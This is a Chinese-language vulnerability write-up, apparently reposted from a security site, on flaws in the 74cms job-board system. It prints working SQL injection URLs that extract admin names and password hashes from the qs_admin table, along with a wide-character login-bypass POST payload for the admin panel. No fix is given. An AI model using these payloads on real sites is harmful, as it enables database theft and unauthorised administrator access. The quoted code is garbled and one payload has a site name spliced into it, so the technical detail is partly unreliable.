整套程式過濾的還是比較全面的 不過所有版本都是gbk編碼是他的硬傷 但是基本上字串入庫的時候作者都使用了iconv來把提交過來的資料編碼轉換成utf8
所以利用寬字元注入就沒辦法了 但是過濾完善僅限3.2版本之前 最新的3.2版本plus目錄多了幾個檔案 不知道是不是換了程式設計師了... 先上兩個白痴注入吧~
注射1:
\plus\ajax_officebuilding.php (16行)
if($act == 'alphabet')
' "); //笑嘻嘻
while($row = $db->fetch_array($result))
else
}if (empty($htm))
的寫字樓!";
}$htm.="";
exit($htm);
}}注射2: \plus\ajax_street.php (16行)
if($act == 'alphabet')
' ");//笑嘻嘻
while($row = $db->fetch_array($result))
else
}if (empty($htm))
的道路!";
}exit($htm);
}}exp:
1. plus/ajax_officebuilding.php?act=alphabet&x=11%d5'%20union%20select%201,2,3,concat(0x3c2f613e20),5,6,7,concat www.2cto.com(0x3c623e5e5f5e203c2f623e,admin_name,0x3a,pwd,0x3c623e205e5f5e3c2f623e),9%20from%20qs_admin%23
2. plus/ajax_street.php?act=alphabet&x=11%d5'%20union%20select%201,2,3,concat(0x3c2f613e20),5,6,7,concat(0x3c623e5e5f5e203c2f623e,admin_name,0x3a,pwd,0x3c623e205e5f5e3c2f623e),9%20from%20qs_admin%23
讀過這程式的應該都知道有注入也是白搭 因為hash解不出來 我沒仔細看他的密碼加密方式 反正是多次加密的 試了十幾個乙個都沒解出來....
所以得來點殺傷力大的 不然不是白搞了嗎 隨後批量搜尋了一些危險函式 執行 變數覆蓋 寫檔案神馬的 都沒什麼好的發現 繼續把目標轉向後台 立馬就笑嘻嘻了~~
\admin\admin_login.php (42行)
elseif($act == 'do_login')
elseif($admin_pwd == '')
$captcha=get_cache('captcha');
if(empty($postcaptcha) && $captcha['verify_adminlogin']=='1')
if ($captcha['verify_adminlogin']=='1' && strcasecmp($_session['imagecaptcha_content'],$postcaptcha)!=0)
elseif(check_admin($admin_name,$admin_pwd)) //關鍵函式 直接帶入進去了
}else
header("location: admin_index.php");
}繼續追下check_admin函式: \admin\include\admin_common.fun.php (197行)
function check_admin($name,$pwd)
else
}再看看get_admin_one函式: \admin\include\admin_common.fun.php (237行)
function get_admin_one($username)
get_admin_one函式和check_admin函式都是直接就帶入查詢了 除了post開頭被addslashes函式過濾過一次 但是在寬字元面前這些都是浮雲~~
so... 直接向 admin_login.php?act=do_login 構造以下post語句就能直接進後台了~~ 當然前提你得有後台路徑:
admin_name=****you%d5' or 1=1%23&admin_pwd=1
漏洞證明:
修復方案:
高人來吧
作者 小屁孩
74cms漏洞分析
很早以前的乙個洞,看到很有意思就拿來看看 這是雨曾經審過的乙個洞,因為讀取方式很特別復現了一下 首先看到乙個sql語句 idresult this query select id from wheresql.orderbysql.limit 倒回去跟進幾個變數 orderbysql order by...
騎士人才系統 7處越權 2處sql
wap user.php 一下越權都是沒有uid的參與,導致任意修改資料庫任何記錄 第一處 elseif act resume work del else 第二處 刪除教育經歷elseif act resume education del else 第三處 elseif act resume tra...
騎士cms注入及後台拿shell
0x1 任意使用者登入 0x2 盲注 0x3 後台拿shell 0x4 隨機函式問題 詳細說明 0x1 任意使用者登入 user login.php elseif empty session uid empty session username empty session utype cookie ...